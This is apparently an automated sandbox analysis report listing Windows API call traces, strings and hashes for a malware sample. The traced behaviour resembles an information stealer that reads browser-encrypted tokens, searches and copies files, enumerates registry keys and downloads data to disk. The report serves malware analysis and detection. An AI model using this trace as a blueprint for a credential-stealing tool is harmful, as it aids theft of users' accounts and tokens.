                                            • lstrcatA.KERNEL32(?,007CADD0,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                            • lstrcatA.KERNEL32(?,?), ref: 00414820
                                            • lstrcatA.KERNEL32(?,?), ref: 00414834
                                            • lstrcatA.KERNEL32(?,0079A5F0), ref: 00414847
                                            • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                            • lstrcatA.KERNEL32(?,007CB8D8), ref: 0041486F
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                              • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                              • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                              • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                              • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                            • String ID: 0aA
                                            • API String ID: 167551676-2786531170
                                            • Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                            • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                            • Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                            • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,007CB010,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,007CB010,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                            • __aulldiv.LIBCMT ref: 00418172
                                            • __aulldiv.LIBCMT ref: 00418180
                                            • wsprintfA.USER32 ref: 004181AC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                            • String ID: %d MB$@
                                            • API String ID: 2886426298-3474575989
                                            • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                            • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                            • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                            • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                            APIs
                                              • Part of subcall function 023FAA07: lstrcpy.KERNEL32(?,00000000), ref: 023FAA4D
                                              • Part of subcall function 023E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023E4A51
                                              • Part of subcall function 023E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023E4A68
                                              • Part of subcall function 023E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023E4A7F
                                              • Part of subcall function 023E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 023E4AA0
                                              • Part of subcall function 023E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 023E4AB0
                                            • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 023E6376
                                            • StrCmpCA.SHLWAPI(?,0064A480), ref: 023E63AE
                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 023E63F6
                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 023E641A
                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 023E6443
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 023E6471
                                            • CloseHandle.KERNEL32(?,?,00000400), ref: 023E64B0
                                            • InternetCloseHandle.WININET(?), ref: 023E64BA
                                            • InternetCloseHandle.WININET(00000000), ref: 023E64C7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                            • String ID:
                                            • API String ID: 4287319946-0
                                            • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                            • Instruction ID: d8703954c0ba4093d7ef59d0a5ec3e9d7c009a689c255ef7a1ee790f838dc203
                                            • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                            • Instruction Fuzzy Hash: 955161B5A40218ABDF20DF90DC55BEE7779EF54705F008098F606A71C0DB74AA89CF95
                                            APIs
                                            • memset.MSVCRT ref: 023F4FEE
                                              • Part of subcall function 023F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 023F9072
                                            • lstrcat.KERNEL32(?,00000000), ref: 023F5017
                                            • lstrcat.KERNEL32(?,00421000), ref: 023F5034
                                              • Part of subcall function 023F4B77: wsprintfA.USER32 ref: 023F4B93
                                              • Part of subcall function 023F4B77: FindFirstFileA.KERNEL32(?,?), ref: 023F4BAA
                                            • memset.MSVCRT ref: 023F507A
                                            • lstrcat.KERNEL32(?,00000000), ref: 023F50A3
                                            • lstrcat.KERNEL32(?,00421020), ref: 023F50C0
                                              • Part of subcall function 023F4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 023F4BD8
                                              • Part of subcall function 023F4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 023F4BEE
                                              • Part of subcall function 023F4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 023F4DE4
                                              • Part of subcall function 023F4B77: FindClose.KERNEL32(000000FF), ref: 023F4DF9
                                            • memset.MSVCRT ref: 023F5106
                                            • lstrcat.KERNEL32(?,00000000), ref: 023F512F
                                            • lstrcat.KERNEL32(?,00421038), ref: 023F514C
                                              • Part of subcall function 023F4B77: wsprintfA.USER32 ref: 023F4C17
                                              • Part of subcall function 023F4B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 023F4C2C
                                              • Part of subcall function 023F4B77: wsprintfA.USER32 ref: 023F4C49
                                              • Part of subcall function 023F4B77: PathMatchSpecA.SHLWAPI(?,?), ref: 023F4C85
                                              • Part of subcall function 023F4B77: lstrcat.KERNEL32(?,0064A524), ref: 023F4CB1
                                              • Part of subcall function 023F4B77: lstrcat.KERNEL32(?,00420FF8), ref: 023F4CC3
                                              • Part of subcall function 023F4B77: lstrcat.KERNEL32(?,?), ref: 023F4CD7
                                              • Part of subcall function 023F4B77: lstrcat.KERNEL32(?,00420FFC), ref: 023F4CE9
                                              • Part of subcall function 023F4B77: lstrcat.KERNEL32(?,?), ref: 023F4CFD
                                              • Part of subcall function 023F4B77: CopyFileA.KERNEL32(?,?,00000001), ref: 023F4D13
                                              • Part of subcall function 023F4B77: DeleteFileA.KERNEL32(?), ref: 023F4D98
                                            • memset.MSVCRT ref: 023F5192
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                            • String ID:
                                            • API String ID: 4017274736-0
                                            • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                            • Instruction ID: c6891db2a4ad274ccacf2c1562e968c93415fb24848080682c3218951e299c35
                                            • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                            • Instruction Fuzzy Hash: 3841C679A4031467DB64F7B0EC46FDD7739AB24701F404495B789661C0EEB85BC88F92
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 023F8397
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 023F839E
                                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 023F83BF
                                            • __aulldiv.LIBCMT ref: 023F83D9
                                            • __aulldiv.LIBCMT ref: 023F83E7
                                            • wsprintfA.USER32 ref: 023F8413
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                            • String ID: @
                                            • API String ID: 2774356765-2766056989
                                            • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                            • Instruction ID: 653bc1300cbe02dc542bce15c1c308a93f2460492bb49a2307e616c51916cca5
                                            • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                            • Instruction Fuzzy Hash: D52147B1E44218ABDB14DFD5DC49FAEBBB9FB44B04F104609F705BB680C778A9008BA5
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                            • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                              • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                            • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                            • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                            • API String ID: 1440504306-1079375795
                                            • Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                            • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                            • Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                            • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess$DefaultLangUser
                                            • String ID: B
                                            • API String ID: 1494266314-2248957098
                                            • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                            • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                            • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                            • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                            APIs
                                            • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                              • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                              • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                              • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                              • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                            • memset.MSVCRT ref: 00409EE8
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                            • API String ID: 1977917189-1096346117
                                            • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                            • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                            • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                            • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                            APIs
                                              • Part of subcall function 023E7537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 023E75A1
                                              • Part of subcall function 023E7537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 023E7618
                                              • Part of subcall function 023E7537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 023E7674
                                              • Part of subcall function 023E7537: GetProcessHeap.KERNEL32(00000000,?), ref: 023E76B9
                                              • Part of subcall function 023E7537: HeapFree.KERNEL32(00000000), ref: 023E76C0
                                            • lstrcat.KERNEL32(0064A668,004217FC), ref: 023E786D
                                            • lstrcat.KERNEL32(0064A668,00000000), ref: 023E78AF
                                            • lstrcat.KERNEL32(0064A668,00421800), ref: 023E78C1
                                            • lstrcat.KERNEL32(0064A668,00000000), ref: 023E78F6
                                            • lstrcat.KERNEL32(0064A668,00421804), ref: 023E7907
                                            • lstrcat.KERNEL32(0064A668,00000000), ref: 023E793A
                                            • lstrcat.KERNEL32(0064A668,00421808), ref: 023E7954
                                            • task.LIBCPMTD ref: 023E7962
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                            • String ID:
                                            • API String ID: 2677904052-0
                                            • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                            • Instruction ID: c056ec38f57f52b24002a3e1a8f8625ebf5ce716988421b15c41c822dab0f4b5
                                            • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                            • Instruction Fuzzy Hash: 38314B7AE40119EFDF04EBE0DC95DFEB77AEB59301B105018E106A72A0DA34E94ACF61
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 023E5231
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 023E5238
                                            • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 023E5251
                                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 023E5278
                                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 023E52A8
                                            • memcpy.MSVCRT(00000000,?,00000001), ref: 023E52F1
                                            • InternetCloseHandle.WININET(?), ref: 023E5320
                                            • InternetCloseHandle.WININET(?), ref: 023E532D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                            • String ID:
                                            • API String ID: 1008454911-0
                                            • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                            • Instruction ID: 8cfa8e2fb8dca274b13a71e31f249ef49054bbd37fc4de3b200eb7713bc5dd15
                                            • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                            • Instruction Fuzzy Hash: 033118B8A40228ABDB20CF94DC84BDCB7B5EB48704F5081D9F709A7281D7706AC5CF98
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                            • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                            • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                            • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                            • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                            • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                            • InternetCloseHandle.WININET(?), ref: 004050C6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                            • String ID:
                                            • API String ID: 3894370878-0
                                            • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                            • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                            • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                            • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                            APIs
                                            • memset.MSVCRT ref: 023E158E
                                              • Part of subcall function 023E1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 023E151B
                                              • Part of subcall function 023E1507: RtlAllocateHeap.NTDLL(00000000), ref: 023E1522
                                              • Part of subcall function 023E1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 023E153E
                                              • Part of subcall function 023E1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 023E155C
                                              • Part of subcall function 023E1507: RegCloseKey.ADVAPI32(?), ref: 023E1566
                                            • lstrcat.KERNEL32(?,00000000), ref: 023E15B6
                                            • lstrlen.KERNEL32(?), ref: 023E15C3
                                            • lstrcat.KERNEL32(?,004262E4), ref: 023E15DE
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                              • Part of subcall function 023F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,023E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 023F8DED
                                              • Part of subcall function 023FAB87: lstrcpy.KERNEL32(00000000,?), ref: 023FABD9
                                              • Part of subcall function 023FAB87: lstrcat.KERNEL32(00000000), ref: 023FABE9
                                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 023E16CC
                                              • Part of subcall function 023FAA07: lstrcpy.KERNEL32(?,00000000), ref: 023FAA4D
                                              • Part of subcall function 023E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 023E9C53
                                              • Part of subcall function 023E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 023E9C78
                                              • Part of subcall function 023E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 023E9C98
                                              • Part of subcall function 023E9C27: ReadFile.KERNEL32(000000FF,?,00000000,023E16F6,00000000), ref: 023E9CC1
                                              • Part of subcall function 023E9C27: LocalFree.KERNEL32(023E16F6), ref: 023E9CF7
                                              • Part of subcall function 023E9C27: CloseHandle.KERNEL32(000000FF), ref: 023E9D01
                                            • DeleteFileA.KERNEL32(00000000), ref: 023E1756
                                            • memset.MSVCRT ref: 023E177D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                            • String ID:
                                            • API String ID: 3885987321-0
                                            • Opcode ID: 65992f5c161543344b7d7a67b9e28a0d0697389c6807308598fc34cd9fe59a0c
                                            • Instruction ID: 92ca0ffa626c361e5f9aa1dac36010b52945dcd47f90dd42758b1cb216f7798f
                                            • Opcode Fuzzy Hash: 65992f5c161543344b7d7a67b9e28a0d0697389c6807308598fc34cd9fe59a0c
                                            • Instruction Fuzzy Hash: 155162B19402289BCB69FB60ED91FED737EAF54700F4041A8A74EA2091EE305F89CF55
                                            APIs
                                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                            • wsprintfA.USER32 ref: 00418459
                                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                            • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • RegQueryValueExA.ADVAPI32(00000000,007CAAE8,00000000,000F003F,?,00000400), ref: 004184EC
                                            • lstrlenA.KERNEL32(?), ref: 00418501
                                            • RegQueryValueExA.ADVAPI32(00000000,007CAB90,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                            • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                            • String ID: %s\%s
                                            • API String ID: 3896182533-4073750446
                                            • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
